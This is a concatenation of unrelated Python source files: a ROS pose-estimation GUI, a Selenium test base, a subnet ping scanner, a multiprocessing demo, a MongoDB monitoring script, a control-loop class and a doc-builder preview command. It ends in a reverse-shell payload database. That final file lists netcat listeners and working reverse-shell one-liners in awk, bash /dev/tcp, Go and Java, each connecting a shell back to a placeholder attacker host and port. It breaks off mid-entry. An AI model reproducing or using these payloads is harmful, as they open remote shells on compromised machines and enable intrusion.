rospy.init_node(NAME, anonymous=True)#,disable_signals=False)
def __del__(self):
try:
self.image_sub.unregister()
except:
pass
try:
self.camerainfo_sub.unregister()
except:
pass
try:
self.object_sub.unregister()
except:
pass
try:
self.pub_relpose.unregister()
except:
pass
self.orenv.Destroy()
def ormousecb(self,link,pos,org):
if link.GetParent().GetNetworkId() == self.orbody.GetNetworkId():
T = linalg.inv(link.GetParent().GetTransform())
bodypos = dot(T[0:3,0:3],pos)+T[0:3,3]
self.orpoint = bodypos
self.ghandle = self.orenv.plot3(points=reshape(bodypos,(1,3)),pointsize=15.0,colors=array((1,0,0)))
return False
def cvmousecb(self,event,x,y,flags,param):
if event == cv.CV_EVENT_LBUTTONUP:
self.cvpoint = (x,y)
if event == cv.CV_EVENT_RBUTTONUP:
self.AddCorrespondence()
if event == cv.CV_EVENT_MBUTTONUP:
self.Reset()
def rungui(self):
self.main = Tk()
self.main.title('Create Object Database - 3 channel image') # window title
self.main.resizable(width=False, height=False)
buttonframe = Frame(self.main)
buttonframe.pack()
b1 = Button(buttonframe, text="Add Correspondence (R-Button)", command=self.AddCorrespondence)
b1.grid(row=1,column=1)
b2 = Button(buttonframe, text="Reset (M-Button)", command=self.Reset)
b2.grid(row=1,column=2)
b2 = Button(buttonframe, text="Quit", command=self.Quit)
b2.grid(row=1,column=3)
# b4 = Button(buttonframe, text="Keyboard", command=self.keycb)
# b4.grid(row=1,column=4)
entryframe = Frame(self.main)
entryframe.pack()
ltrans = Label(entryframe, text='Transform:')
ltrans.grid(row=1,column=1,sticky=W+E)
self.T_entry = Entry(entryframe,bg='white',width=100)
self.T_entry.grid(row=1,column=2)
# self.T_entry.grid(row=1,column=4)
self.main.mainloop()
def camerainfocb(self,infomsg):
with self.extractionlck:
self.KK = reshape(infomsg.K,(3,3))
if any([f!=0 for f in infomsg.D]):
print('Program does not support distorted images')
def imagecb(self,imagemsg):
with self.extractionlck:
self.imagemsg = imagemsg
def objectcb(self,objectmsg):
with self.extractionlck:
if len(objectmsg.objects) > 0:
quat = objectmsg.objects[0].pose.orientation
trans = objectmsg.objects[0].pose.position
self.pattern = (matrixFromPose([quat.w,quat.x,quat.y,quat.z,trans.x,trans.y,trans.z]),objectmsg.header.frame_id)
else:
self.pattern = (None,None)
def AddCorrespondence(self):
with self.extractionlck:
print('add correspondence')
# if self.frame_id:
# base_frame_id = self.orbody.GetLinks()[0].GetName()
# (trans,rot) = self.lookupTransform(base_frame_id, self.frame_id, rospy.Time(0))
# pose = r_[rot[3],rot[0],rot[1],rot[2],trans]
# self.pattern = (matrixFromPose(pose),base_frame_id)
if self.cvpoint is not None and self.orpoint is not None and self.pattern[0] is not None:
Tpattern_inv = linalg.inv(self.pattern[0])
self.imagepoints.append(array(self.cvpoint))
self.objectpoints.append(array(self.orpoint))
print('total gathered points: %d'%len(self.imagepoints))
if len(self.imagepoints) >= 4:
print(array(self.imagepoints))
print(array(self.objectpoints))
print(self.pattern[0])
Tcameraobject = FindExtrinsicCameraParams(array(self.imagepoints,float),array(self.objectpoints,float),self.KK)
self.Tobjectrel = dot(Tpattern_inv,Tcameraobject)
print('camera transform: ', Tcameraobject)
values = reshape(self.Tobjectrel[0:3,0:4],(12,))
print("relative transform is: ",self.Tobjectrel)
self.T_entry.insert(0, ' '.join(str(f) for f in values))
else:
print('point data not initialized')
def Reset(self):
print('reset')
self.imagepoints = []
self.objectpoints = []
self.Tobjectrel = None
def Quit(self):
print('quitting from gui')
self.doquit = True
self.main.quit()
def drawpart(self,cv_image,T,KK):
N = self.trimesh.vertices.shape[0]
pts = dot(transformPoints(T,self.trimesh.vertices),transpose(KK))
imagepts = pts[0:N,0:2]/reshape(repeat(pts[0:N,2],2),[N,2])
cvimagepts = [tuple(p) for p in array(imagepts,int)]
for tri in self.trimesh.indices:
cv.Line(cv_image,cvimagepts[tri[0]],cvimagepts[tri[1]],(255,255,255))
cv.Line(cv_image,cvimagepts[tri[1]],cvimagepts[tri[2]],(255,255,255))
cv.Line(cv_image,cvimagepts[tri[2]],cvimagepts[tri[0]],(255,255,255))
def drawcoordsys(self,cv_image,T,KK):
points3d = array(((0,0,0),(0.05,0,0),(0,0.05,0),(0,0,0.05)))
projpts = dot(transformPoints(T,points3d),transpose(KK))
x = array(projpts[:,0]/projpts[:,2],int)
y = array(projpts[:,1]/projpts[:,2],int)
cv.Line(cv_image,(x[0],y[0]),(x[1],y[1]),(0,0,255),1)
cv.Line(cv_image,(x[0],y[0]),(x[2],y[2]),(0,255,0),1)
cv.Line(cv_image,(x[0],y[0]),(x[3],y[3]),(255,0,0),1)
def keycb(self, char):
a=1
if (char != -1):
with self.extractionlck:
minangle=pi/200
mintranslation=.001
if char==1113955: #NumLock Insert
R=rotationMatrixFromAxisAngle(array([1,0,0]),minangle)
T=array([0,0,0])
elif char==1114111: #Num Lock Delete
R=rotationMatrixFromAxisAngle(array([1,0,0]),-minangle)
T=array([0,0,0])
elif char==1113936: #NumLock Home
R=rotationMatrixFromAxisAngle(array([0,1,0]),minangle)
T=array([0,0,0])
elif char==1113943: #Num Lock End
R=rotationMatrixFromAxisAngle(array([0,1,0]),-minangle)
T=array([0,0,0])
elif char==1113941: #Num Lock Page Up
R=rotationMatrixFromAxisAngle(array([0,0,1]),minangle)
T=array([0,0,0])
elif char==1113942: #Num Lock Page Down
R=rotationMatrixFromAxisAngle(array([0,0,1]),-minangle)
T=array([0,0,0])
elif char==65379: #Insert
R=eye(3)
T=array([1,0,0])
elif char==65535: #Delete
R=eye(3)
T=array([-1,0,0])
elif char==65360: #Home
R=eye(3)
T=array([0,1,0])
elif char==65367: #End
R=eye(3)
T=array([0,-1,0])
elif char==65365: #Page Up
R=eye(3)
T=array([0,0,1])
elif char==65366: #Page Down
R=eye(3)
T=array([0,0,-1])
else:
a=0
if a==1:
self.Tobjectrel[:3,:3]=dot(R,self.Tobjectrel[:3,:3])
self.Tobjectrel[:3,3]=self.Tobjectrel[:3,3]+mintranslation*T
print("relative: ",self.Tobjectrel)
def spin(self):
while not rospy.is_shutdown() and not self.doquit:
with self.extractionlck:
imagemsg = copy.copy(self.imagemsg)
KK = array(self.KK)
Tobjectrel = array(self.Tobjectrel) if self.Tobjectrel is not None else None
Tpattern = array(self.pattern[0]) if self.pattern[0] is not None else None
if KK is None or imagemsg is None:
time.sleep(0.1)
continue
try:
cv_image = self.bridge.imgmsg_to_cv(imagemsg, "bgr8")
except CvBridgeError as e:
print(e)
if Tpattern is not None:
if Tobjectrel is not None:
self.drawpart(cv_image,dot(Tpattern,Tobjectrel),KK)
self.drawcoordsys(cv_image,Tpattern,KK)
if self.cvpoint is not None:
cv.Circle(cv_image,self.cvpoint,2,(0,0,255),2)
if Tobjectrel is not None:
posemsg = geometry_msgs.msg.Pose()
posemsg.orientation.w, posemsg.orientation.x, posemsg.orientation.y, posemsg.orientation.z, posemsg.position.x, posemsg.position.y, posemsg.position.z = poseFromMatrix(Tobjectrel)
self.pub_relpose.publish(posemsg)
gtk.gdk.threads_enter()
cv.ShowImage(self.cvwindow, cv_image)
char=cv.WaitKey(20)
self.keycb(char)
gtk.gdk.threads_leave()
time.sleep(1.0)
print('quitting spin')
if __name__== '__main__':
parser = OptionParser(description='Estiamtes the pose of an openrave object by specifying manual correspondeces between the image and the openrave environment. If a separate ObjectDetection pattern is added, will publish the pose of the object with respect to the pattern.')
parser.add_option('--quiet',action='store_true', dest='quiet',default=False,
help="If set will not print extraction output and times.")
parser.add_option('--kinbody', action='store', type='string', dest='kinbody',
help='OpenRAVE Kinbody file to load')
# parser.add_option('--frame_id', action='store', type='string', dest='frame_id',default=None,
# help='tf frame id for possible frame that camera is connected to')
parser.add_option('--Tobjectrel', action='store', type='string', dest='Tobjectrel',default=None,
help='Initial estimate of Tobject (3x4 matrix serialized by row-order)')
(options, args) = parser.parse_args()
if not options.kinbody:
print('Error: Need to specify a template')
sys.exit(1)
gtk.gdk.threads_init()
try:
processor = PoseFromCorrespondences(options.kinbody)
if options.Tobjectrel is not None:
processor.Tobjectrel = r_[reshape([float(s) for s in options.Tobjectrel.split()[0:12]],[3,4]),[[0,0,0,1]]]
processor.spin()
except KeyboardInterrupt as e:
pass
|
test_base.py
|
import os
import tornado.ioloop
import tornado.httpserver
import multiprocessing
import unittest
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from vaindraft.app import Application
def create_process(port, queue, boot_function, application, processor=multiprocessing):
p = processor.Process(target=boot_function, args=(queue, port, application))
p.start()
return p
def start_application_server(queue, port, application):
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(port)
actual_port = port
if port == 0: # special case, an available port is picked automatically
# only pick first! (for now)
assert len(http_server._sockets) > 0
for s in http_server._sockets:
actual_port = http_server._sockets[s].getsockname()[1]
break
info = {
"port":actual_port,
}
queue.put_nowait(info)
tornado.ioloop.IOLoop.instance().start()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self.application = Application()
self.queue = multiprocessing.Queue()
self.server_process = create_process(0, self.queue, start_application_server, self.application)
options = Options()
options.add_argument("--headless")
self.driver = webdriver.Firefox(firefox_options=options)
def tearDown(self):
self.driver.quit()
self.server_process.terminate()
def wait_for_element(self, element_id, timeout=10):
return WebDriverWait(self.driver, timeout).until( EC.presence_of_element_located((By.ID, element_id)))
|
scan_ip.py
|
'''
Scan device ip address in the name network
Author:
Viki (a) Vignesh Natarajan
https://vikiworks.io
'''
import os
import socket
import multiprocessing
import subprocess
from multiprocessing import Process, Queue
import signal
import time
from time import sleep
import sys
import threading
debug = False
#debug = True
child_process_list = []
parent_process_id = None
class_c_address_len = 255
number_of_process = 30
search_timeout = 200 #seconds
pingable_ip_list = []
#For Python3 pingtimeout is working
ping_timeout = 2 #seconds
#For Python2 pingtimeout is notworking
ping_timeout = None #seconds
queue_get_timeout = 1 #seconds
def ping_ip(parent_write_queue, child_write_queue):
cmd = "ping"
arg1 = "-c1"
timeout_seconds=1
with open(os.devnull, 'w') as null_device:
''' Fetch IP one by one and ping - Likewise all the child will be doing but with unique ip address '''
while True:
if parent_write_queue.empty():
return
try:
ip = parent_write_queue.get(timeout=queue_get_timeout) #timeout in seconds
except:
if debug == True :
print("QUEUE TIMEOUT ERROR");
return
try:
#ping -c1 <ip address>
timeout_seconds = 10
if debug == True :
print("[ "+str(os.getpid())+" ] [ PINGING : "+str(ip)+" ]")
if ping_timeout == None:
subprocess.check_call([cmd, arg1, ip],stdout=null_device, stderr=null_device)
else:
subprocess.check_call([cmd, arg1, ip],stdout=null_device, stderr=null_device, timeout=ping_timeout)
child_write_queue.put(ip)
#print("[ DISCOVERED NEIGHBOUR : "+str(ip)+"\t]")
except:
child_write_queue.put(None)
if debug == True :
print("[ IP ADDRESS ] [ "+str(ip)+" ] [ NOT REACHABLE ]");
pass
#sleep(1)
return
def get_host_ip():
dns = "8.8.8.8"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((dns, port))
host_ip = s.getsockname()[0]
s.close()
return host_ip
def parent_signal_handler(signum, frame):
global child_process_list, parent_process_id
pid = os.getpid()
if (pid != None) and (pid != parent_process_id):
if debug == True :
print("[ERROR: SOME PROCESS OTHER THAN PARENT GOT (CTRL + C) Signal]")
return
if debug == True :
print("[PARENT_PROCESS : "+str(pid)+" ] GOT ( CTRL + C ) EVENT")
for child_process in child_process_list:
try:
if child_process.is_alive():
if debug == True :
print("[ PARENT ] [ TERMINATING ][ CHILD_PROCESS_ID : "+str(child_process.pid)+" ]")
child_process.terminate()
except:
pass
sys.exit(-1);
def child_signal_handler(signum, frame):
''' TERMINATING OTHER CLIENTS AND ITSELF
'''
if debug == True :
print("[ CHILD GOT (CTRL + C) SIGNAL] [ TERMINATING OTHER CLIENTS ]")
my_pid = os.getpid()
current_process = None
for child_process in child_process_list:
if(child_process.pid == my_pid):
current_process = child_process
continue
try:
if child_process.is_alive():
if debug == True :
print("[ CHILD ] [ TERMINATING ][ CHILD_PROCESS_ID : "+str(child_process.pid)+" ]")
child_process.terminate()
except:
pass
try:
#Terminate current child process
if (current_process !=None) and (current_process.is_alive()):
if debug == True :
print("[ CHILD ] [ TERMINATING ITSELF][ CHILD_PROCESS_ID : "+str(current_process.pid)+" ]")
current_process.terminate()
except:
pass
def parent_signal_listener():
try:
signal.signal(signal.SIGINT, parent_signal_handler)
except:
if debug == True :
print("[ ERROR: UNABLE TO SET HANDLER FOR SIGNAL -> SIGINT ]")
def child_signal_listener():
try:
signal.signal(signal.SIGINT, child_signal_handler)
except:
if debug == True :
print("[ ERROR: UNABLE TO SET HANDLER FOR SIGNAL -> SIGINT ]")
def print_results(child_write_queue):
if debug == True:
print("[PRINTING RESULTS]")
result_cnt = 0
global pingable_ip_list
start_time = time.time()
while True:
current_time = time.time()
time_delta = current_time - start_time
if (int(time_delta) >= search_timeout):
if debug == True:
print("[ SEARCH TIME EXPIRED ]")
time.sleep(0.5)
break
if child_write_queue.empty():
time.sleep(0.25)
continue
try:
ip = child_write_queue.get() #Remove data from queue [ Not reading, removing ;-) ]
if ip != None:
pingable_ip_list.append(ip)
print(str(ip))
else:
if debug == True:
print("[ DISCOVERED NEIGHBOUR : "+"None"+"\t]")
result_cnt += 1
if result_cnt >= class_c_address_len :
#print("[ IP SEARCH COMPLETED ]")
break
except:
if debug == True:
print("[ QUEUE GET EXCEPTION ]")
break
time.sleep(.25)
if debug == True:
print("[ RAISING SIGINT ]")
os.kill(os.getpid(), signal.SIGINT)
def DiscoverNeighborIPs():
global child_process_list, parent_process_id
my_host_ip = get_host_ip()
#print("[ HOST IP : "+str(my_host_ip)+" ]\n")
split_ip = my_host_ip.split('.')
base_ip = split_ip[0] + '.' + split_ip[1] + '.' + split_ip[2] + '.'
''' Queue where parent adds all usable ip address in a subnet and
child removes ip address from queue
'''
parent_write_queue = Queue()
''' Queue where child adds pingable ip address and
parent removes ip address from queue
'''
child_write_queue = Queue()
#Add 255 ip addresses for child to ping in the parent_write_queue
for i in range(class_c_address_len):
ip_address = base_ip + str(i+1)
parent_write_queue.put(ip_address)
''' Ask child process to listen ctrl+c signal '''
child_signal_listener()
child_process=None
for cp in range(number_of_process):
child_process = Process(target=ping_ip, args=(parent_write_queue, child_write_queue))
child_process_list.append(child_process)
child_process.start()
child_process = None
thread = threading.Thread(target=print_results, args=(child_write_queue,))
thread.daemon = True
thread.start()
for child_process in child_process_list:
''' Block Parent Process from terminating until this child_process completes its job '''
child_process.join()
'''[ MAKE PARENT PROCESS LISTNER TO ( CTRL + C) SIGNAL ]'''
parent_signal_listener()
#pingable_ip_list = print_results(child_write_queue)
return
def main():
global parent_process_id
parent_process_id = os.getpid()
if debug == True :
print("[ Parent Process ID : "+str(os.getpid())+" ]")
DiscoverNeighborIPs()
ip_list = pingable_ip_list
#print("\n[ REPORT: DISCOVERED IP ADDRESS LIST ]")
#for ip in ip_list:
# print("\t => "+str(ip))
if __name__ == '__main__':
main()
|
multiprocessing.py
|
"""
→ Python Multiprocessing
- multiprocessing = runnig tasks in parallel on different cpu cores, bypasses GIL used for thread
better for cpu bound tasks (heavy cpu usage)
better for io bound tasks(waiting around)
"""
import time
from multiprocessing import Process, cpu_count
def counter(num):
count = 0
while count > num:
count += 1
def main():
print(cpu_count())
a = Process(target=counter, args=(5000,))
b = Process(target=counter, args=(500,))
a.start()
b.start()
a.join()
b.join()
print("finished in:",time.perf_counter(),"seconds")
if __name__ == "__main__":
main()
|
check_mongodb.py
|
#!/usr/bin/env python
#coding:utf-8
import os
import sys
import string
import time
import datetime
import MySQLdb
import pymongo
import bson
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("lepus")
path='./include'
sys.path.insert(0,path)
import functions as func
from multiprocessing import Process;
def check_mongodb(host,port,user,passwd,server_id,tags):
try:
func.mysql_exec("insert into mongodb_status_history SELECT *,LEFT(REPLACE(REPLACE(REPLACE(create_time,'-',''),' ',''),':',''),12) from mongodb_status where server_id='%s';" %(server_id),'')
func.mysql_exec("delete from mongodb_status where server_id='%s';" %(server_id),'')
#connect = pymongo.Connection(host,int(port))
client = pymongo.MongoClient(host, int(port))
db = client['admin']
db.authenticate(user,passwd)
serverStatus=client.admin.command(bson.son.SON([('serverStatus', 1), ('repl', 2)]))
time.sleep(1)
serverStatus_2=client.admin.command(bson.son.SON([('serverStatus', 1), ('repl', 2)]))
connect = 1
ok = int(serverStatus['ok'])
version = serverStatus['version']
uptime = serverStatus['uptime']
connections_current = serverStatus['connections']['current']
connections_available = serverStatus['connections']['available']
globalLock_activeClients = serverStatus['globalLock']['activeClients']['total']
globalLock_currentQueue = serverStatus['globalLock']['currentQueue']['total']
mem_bits = serverStatus['mem']['bits']
mem_resident = serverStatus['mem']['resident']
mem_virtual = serverStatus['mem']['virtual']
mem_supported = serverStatus['mem']['supported']
mem_mapped = serverStatus['mem']['mapped']
mem_mappedWithJournal = serverStatus['mem']['mappedWithJournal']
network_bytesIn_persecond = int(serverStatus_2['network']['bytesIn']) - int(serverStatus['network']['bytesIn'])
network_bytesOut_persecond = int(serverStatus_2['network']['bytesOut']) - int(serverStatus['network']['bytesOut'])
network_numRequests_persecond = int(serverStatus_2['network']['numRequests']) - int(serverStatus['network']['numRequests'])
opcounters_insert_persecond = int(serverStatus_2['opcounters']['insert']) - int(serverStatus['opcounters']['insert'])
opcounters_query_persecond = int(serverStatus_2['opcounters']['query']) - int(serverStatus['opcounters']['query'])
opcounters_update_persecond = int(serverStatus_2['opcounters']['update']) - int(serverStatus['opcounters']['update'])
opcounters_delete_persecond = int(serverStatus_2['opcounters']['delete']) - int(serverStatus['opcounters']['delete'])
opcounters_command_persecond = int(serverStatus_2['opcounters']['command']) - int(serverStatus['opcounters']['command'])
#replset
try:
repl=serverStatus['repl']
setName=repl['setName']
replset=1
if repl['secondary']== True:
repl_role='secondary'
repl_role_new='s'
else:
repl_role='master'
repl_role_new='m'
except:
replset=0
repl_role='master'
repl_role_new='m'
pass
##################### insert data to mysql server#############################
sql = "insert into mongodb_status(server_id,host,port,tags,connect,replset,repl_role,ok,uptime,version,connections_current,connections_available,globalLock_currentQueue,globalLock_activeClients,mem_bits,mem_resident,mem_virtual,mem_supported,mem_mapped,mem_mappedWithJournal,network_bytesIn_persecond,network_bytesOut_persecond,network_numRequests_persecond,opcounters_insert_persecond,opcounters_query_persecond,opcounters_update_persecond,opcounters_delete_persecond,opcounters_command_persecond) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (server_id,host,port,tags,connect,replset,repl_role,ok,uptime,version,connections_current,connections_available,globalLock_currentQueue,globalLock_activeClients,mem_bits,mem_resident,mem_virtual,mem_supported,mem_mapped,mem_mappedWithJournal,network_bytesIn_persecond,network_bytesOut_persecond,network_numRequests_persecond,opcounters_insert_persecond,opcounters_query_persecond,opcounters_update_persecond,opcounters_delete_persecond,opcounters_command_persecond)
func.mysql_exec(sql,param)
role='m'
func.update_db_status_init(repl_role_new,version,host,port,tags)
except Exception, e:
logger_msg="check mongodb %s:%s : %s" %(host,port,e)
logger.warning(logger_msg)
try:
connect=0
sql="insert into mongodb_status(server_id,host,port,tags,connect) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,connect)
func.mysql_exec(sql,param)
except Exception, e:
logger.error(e)
sys.exit(1)
finally:
sys.exit(1)
finally:
func.check_db_status(server_id,host,port,tags,'mongodb')
sys.exit(1)
def main():
servers = func.mysql_query('select id,host,port,username,password,tags from db_servers_mongodb where is_delete=0 and monitor=1;')
logger.info("check mongodb controller started.")
if servers:
plist = []
for row in servers:
server_id=row[0]
host=row[1]
port=row[2]
username=row[3]
password=row[4]
tags=row[5]
p = Process(target = check_mongodb, args = (host,port,username,password,server_id,tags))
plist.append(p)
p.start()
for p in plist:
p.join()
else:
logger.warning("check mongodb: not found any servers")
logger.info("check mongodb controller finished.")
if __name__=='__main__':
main()
|
control.py
|
import collections, functools, sys, threading
from . extractor import Extractor
from .. project import construct, importer
from .. util.log_errors import LogErrors
from .. util import deprecated, flatten, log
from .. util.threads import runnable
from . routing import ActionList, Routing
class Control(runnable.Runnable):
DEFAULT = {'datatype': ActionList}
def __init__(self, routing=None, default=None, errors='raise',
python_path='bibliopixel.control', verbose=False,
pre_routing=None):
"""
:param Address pre_routing: This Address is set with with the message
after the message is received and converted, but before it is
routed.
:param errors: either a number, indicating how many errors to report
before ignoring them, or one of these strings:
'raise', meaning to raise an exception
'ignore', meaning to ignore all errors
'report', meaning to report all errors
"""
super().__init__()
self.verbose = verbose
self.receive = LogErrors(self._receive, errors)
default = dict(self.DEFAULT, **(default or {}))
self.pre_routing = ActionList(pre_routing)
self.routing = Routing(routing or {}, default or {}, python_path)
def set_project(self, project):
self.pre_routing.set_project(project)
self.routing.set_project(project)
def start(self):
super().start()
if self.verbose:
log.info('Starting %s', self)
self.thread = self._make_thread()
getattr(self.thread, 'start', lambda: None)()
def stop(self):
super().stop()
getattr(self.thread, 'stop', lambda: None)()
def _receive(self, msg):
"""
Receive a message from the input source and perhaps raise an Exception.
"""
msg = self._convert(msg)
if msg is None:
return
str_msg = self.verbose and self._msg_to_str(msg)
if self.verbose and log.is_debug():
log.debug('Message %s', str_msg)
if self.pre_routing:
self.pre_routing.receive(msg)
receiver, msg = self.routing.receive(msg)
if receiver:
receiver.receive(msg)
if self.verbose:
log.info('Routed message %s (%s) to %s', str_msg[:128], msg,
repr(receiver))
def _convert(self, msg):
"""
Convert the message to a Control-specific format
"""
raise NotImplementedError
def _make_thread(self):
"""
Returns a new thread to run the loop for this control source.
"""
pass
def _msg_to_str(self, msg):
if msg is None:
return '(None)'
return '.'.join(str(s) for s in msg.values()) or '.'
def __bool__(self):
return bool(self.routing or self.pre_routing)
class ControlLoop:
"""Mixin class for looping controls"""
def _receive_all_messages(self):
for msg in self.messages():
self.receive(msg)
if not self.running:
return
def messages(self):
"""Should yield a sequence of messages from the input source."""
raise NotImplementedError
def _make_thread(self):
return threading.Thread(target=self._receive_all_messages, daemon=True)
class ExtractedControl(Control):
EXTRACTOR = {}
def __init__(self, extractor=None, **kwds):
super().__init__(**kwds)
extractor = dict(self.EXTRACTOR, **(extractor or {}))
self.extractor = Extractor(**extractor)
def _convert(self, msg):
return self.extractor.extract(msg)
class ExtractedLoop(ExtractedControl, ControlLoop):
def _make_thread(self):
return ControlLoop._make_thread(self)
|
preview.py
|
# coding=utf-8
# Copyright 2021 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import shutil
import subprocess
import tempfile
import time
from pathlib import Path
from threading import Thread
from doc_builder import build_doc
from doc_builder.commands.build import check_node_is_available, locate_kit_folder
from doc_builder.commands.convert_doc_file import find_root_git
from doc_builder.utils import is_watchdog_available, read_doc_config
if is_watchdog_available():
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
class WatchEventHandler(FileSystemEventHandler):
"""
Utility class for building updated mdx files when a file change event is recorded.
"""
def __init__(self, args, source_files_mapping, kit_routes_folder):
super().__init__()
self.args = args
self.source_files_mapping = source_files_mapping
self.kit_routes_folder = kit_routes_folder
def on_created(self, event):
super().on_created(event)
is_valid, src_path, relative_path = self.transform_path(event)
if is_valid:
self.build(src_path, relative_path)
def on_modified(self, event):
super().on_modified(event)
is_valid, src_path, relative_path = self.transform_path(event)
if is_valid:
self.build(src_path, relative_path)
def transform_path(self, event):
"""
Check if a file is a doc file (mdx, or py file used as autodoc).
If so, returns mdx file path.
"""
src_path = event.src_path
parent_path_absolute = str(Path(self.args.path_to_docs).absolute())
relative_path = event.src_path[len(parent_path_absolute) + 1 :]
is_valid_file = False
if not event.is_directory:
if src_path.endswith(".py") and src_path in self.source_files_mapping:
src_path = self.source_files_mapping[src_path]
# if src_path.endswith(".md"):
# # src_path += "x"
# relative_path += "x"
if src_path.endswith(".mdx") or src_path.endswith(".md"):
is_valid_file = True
return is_valid_file, src_path, relative_path
return is_valid_file, src_path, relative_path
def build(self, src_path, relative_path):
"""
Build single mdx file in a temp dir.
"""
print(f"Building: {src_path}")
try:
# copy the built files into the actual build folder dawg
with tempfile.TemporaryDirectory() as tmp_input_dir:
# copy the file into tmp_input_dir
shutil.copy(src_path, tmp_input_dir)
with tempfile.TemporaryDirectory() as tmp_out_dir:
build_doc(
self.args.library_name,
tmp_input_dir,
tmp_out_dir,
version=self.args.version,
language=self.args.language,
is_python_module=not self.args.not_python_module,
watch_mode=True,
)
if str(src_path).endswith(".md"):
src_path += "x"
relative_path += "x"
src = Path(tmp_out_dir) / Path(src_path).name
dest = self.kit_routes_folder / relative_path
shutil.move(src, dest)
except Exception as e:
print(f"Error building: {src_path}\n{e}")
def start_watcher(path, event_handler):
"""
Starts `pywatchdog.observer` for listening changes in `path`.
"""
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
print(f"\nWatching for changes in: {path}\n")
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
def start_sveltekit_dev(tmp_dir, env, args):
"""
Installs sveltekit node dependencies & starts sveltekit in dev mode in a temp dir.
"""
working_dir = str(tmp_dir / "kit")
print("Installing node dependencies")
subprocess.run(
["npm", "ci"],
stdout=subprocess.PIPE,
check=True,
encoding="utf-8",
cwd=working_dir,
)
# start sveltekit in dev mode
subprocess.run(
["npm", "run", "dev"],
check=True,
encoding="utf-8",
cwd=working_dir,
env=env,
)
def preview_command(args):
if not is_watchdog_available():
raise ImportError(
"Please install `watchdog` to run `doc-builder preview` command.\nYou can do so through pip: `pip install watchdog`"
)
read_doc_config(args.path_to_docs)
# Error at the beginning if node is not properly installed.
check_node_is_available()
# Error at the beginning if we can't locate the kit folder
kit_folder = locate_kit_folder()
if kit_folder is None:
raise EnvironmentError(
"Requires the kit subfolder of the doc-builder repo. We couldn't find it with "
"the doc-builder package installed, so you need to run the command from inside the doc-builder repo."
)
with tempfile.TemporaryDirectory() as tmp_dir:
output_path = Path(tmp_dir) / args.library_name / args.version / args.language
print("Initial build docs for", args.library_name, args.path_to_docs, output_path)
source_files_mapping = build_doc(
args.library_name,
args.path_to_docs,
output_path,
clean=True,
version=args.version,
language=args.language,
is_python_module=not args.not_python_module,
)
# convert the MDX files into HTML files.
tmp_dir = Path(tmp_dir)
# Copy everything in a tmp dir
shutil.copytree(kit_folder, tmp_dir / "kit")
# Manual copy and overwrite from output_path to tmp_dir / "kit" / "src" / "routes"
# We don't use shutil.copytree as tmp_dir / "kit" / "src" / "routes" exists and contains important files.
kit_routes_folder = tmp_dir / "kit" / "src" / "routes"
# files/folders cannot have a name that starts with `__` since it is a reserved Sveltekit keyword
for p in output_path.glob("**/*__*"):
if p.exists():
p.rmdir if p.is_dir() else p.unlink()
for f in output_path.iterdir():
dest = kit_routes_folder / f.name
if f.is_dir():
# Remove the dest folder if it exists
if dest.is_dir():
shutil.rmtree(dest)
shutil.copytree(f, dest)
else:
shutil.copy(f, dest)
# Node
env = os.environ.copy()
env["DOCS_LIBRARY"] = args.library_name
env["DOCS_VERSION"] = args.version
env["DOCS_LANGUAGE"] = args.language
Thread(target=start_sveltekit_dev, args=(tmp_dir, env, args)).start()
git_folder = find_root_git(args.path_to_docs)
event_handler = WatchEventHandler(args, source_files_mapping, kit_routes_folder)
start_watcher(git_folder, event_handler)
def preview_command_parser(subparsers=None):
if subparsers is not None:
parser = subparsers.add_parser("preview")
else:
parser = argparse.ArgumentParser("Doc Builder preview command")
parser.add_argument("library_name", type=str, help="Library name")
parser.add_argument(
"path_to_docs",
type=str,
help="Local path to library documentation. The library should be cloned, and the folder containing the "
"documentation files should be indicated here.",
)
parser.add_argument("--language", type=str, help="Language of the documentation to generate", default="en")
parser.add_argument("--version", type=str, help="Version of the documentation to generate", default="main")
parser.add_argument(
"--not_python_module",
action="store_true",
help="Whether docs files do NOT have correspoding python module (like HF course & hub docs).",
)
if subparsers is not None:
parser.set_defaults(func=preview_command)
return parser
|
database.py
|
class Shell(object):
def __init__(self: object) -> None:
self.listener: dict = {
'tcp': 'rlwrap nc -lvvnp {lport}',
'udp': 'rlwrap nc -u -lvvnp {lport}',
}
self.database: dict = {
'linux': {
'tcp': {
'awk': (
"""awk 'BEGIN LEFTBRACKETs = "/inet/tcp/0/{lhost}>/{lport}"; while(42) LEFTBRACKET doLEFTBRACKET printf "shell>" |& s; s |& getline c; if(c)LEFTBRACKET while ((c |& getline) > 0) print $0 |& s; close(c); RIGHTBRACKET RIGHTBRACKET while(c != "exit") close(s); RIGHTBRACKETRIGHTBRACKET' /dev/null""",
),
'bash': (
"""/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1""",
),
'go': (
"""echo 'package main;import"os/exec";import"net";func main()LEFTBRACKETc,_:=net.Dial("tcp","{lhost}:{lport}");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()RIGHTBRACKET' >| /tmp/.t.go && go run /tmp/.t.go && rm -f /tmp/.t.go""",
),
'java': (
"""r=Runtime.getRuntime();p=r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{lhost}/{lport};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);p.waitFor()""",
),
'lua': (
